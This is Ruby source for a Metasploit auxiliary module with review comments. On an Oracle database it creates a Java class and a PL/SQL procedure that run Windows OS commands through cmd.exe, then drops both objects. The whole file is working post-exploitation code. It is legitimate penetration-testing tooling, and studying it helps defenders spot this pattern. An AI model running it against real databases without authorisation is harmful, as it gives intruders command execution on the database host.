GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
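# Auxiliary module for an Oracle database session: it compiles a small Java
# source that exposes Runtime.exec, wraps it in a PL/SQL procedure, calls that
# procedure once with `cmd.exe /c <CMD>`, and then drops both objects.
#
# Connection handling (check_dependencies, prepare_exec) comes from
# Msf::Exploit::ORACLE and is not visible in this file.
#
# Both object names are random upper-case strings generated per run, so the
# stable part of the footprint is the statement shape (`create or replace and
# resolve java source`, `create or replace procedure ... as language java`,
# and the matching `drop` statements), not the names.
# NOTE(review): whether these statements reach an audit trail depends on the
# database's audit configuration - confirm for the environment under test.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers module metadata and the single CMD option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Java execCommand (Win32)',
        'Description' => %q{
          This module will create a java class which enables the execution of OS commands.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],
        ],
        'DisclosureDate' => '2007-12-07',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The module creates and drops schema objects, hence CONFIG_CHANGES.
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
      ]
    )
  end

  # Creates the Java source and wrapper procedure, invokes the procedure with
  # the configured command, and removes both objects afterwards.
  #
  # Removal runs in an `ensure` block so that a failure while creating the
  # procedure or sending the command does not leave a command-execution
  # procedure behind in the assessed database.
  #
  # @return [void]
  def run
    return unless check_dependencies

    # CMD is optional in register_options; refuse to touch the database when
    # there is nothing to run.
    command = datastore['CMD'].to_s
    if command.strip.empty?
      print_error('CMD is empty; nothing to execute.')
      return
    end

    source = Rex::Text.rand_text_alpha_upper(1..10)
    name = Rex::Text.rand_text_alpha_upper(1..10)

    java = <<~SQL

      create or replace and resolve java source named "#{source}" as
      import java.lang.*;
      import java.io.*;
      public class #{source}
      {
      public static void execCommand (String command) throws IOException
      {
      Runtime.getRuntime().exec(command);
      }
      };
    SQL

    procedure = <<~SQL

      create or replace procedure #{name} (p_command in varchar2)
      as language java
      name '#{source}.execCommand (java.lang.String)';
    SQL

    # NOTE(review): CMD is spliced verbatim into a single-quoted PL/SQL
    # literal, so a value containing a single quote yields a malformed
    # statement.
    exec = "begin #{name}('cmd.exe /c #{command}'); end;"

    drops = "drop java source #{source}"
    dropp = "drop procedure #{name}"

    begin
      print_status("Creating java source '#{source}'...")
      prepare_exec(java)
    rescue StandardError => e
      # Nothing is cleaned up on this path, matching the original early return.
      print_error("Could not create java source '#{source}': #{e.class} #{e.message}")
      return
    end

    procedure_attempted = false
    begin
      print_status("Creating procedure '#{name}'...")
      procedure_attempted = true
      prepare_exec(procedure)

      print_status("Sending command: '#{command}'")
      prepare_exec(exec)
    ensure
      # Same removal order as before: java source first, then the procedure.
      remove_object("java source '#{source}'", drops)
      remove_object("procedure '#{name}'", dropp) if procedure_attempted
    end
  end

  private

  # Best-effort removal of one schema object created by #run.
  #
  # A failure is reported instead of raised so that the second removal is
  # still attempted and the operator knows which object needs manual cleanup.
  #
  # @param label [String] human-readable object description used in messages
  # @param sql [String] the `drop ...` statement to execute
  # @return [void]
  def remove_object(label, sql)
    print_status("Removing #{label}...")
    prepare_exec(sql)
  rescue StandardError => e
    print_error("Failed to remove #{label}: #{e.class} #{e.message}. Remove it manually.")
  end
end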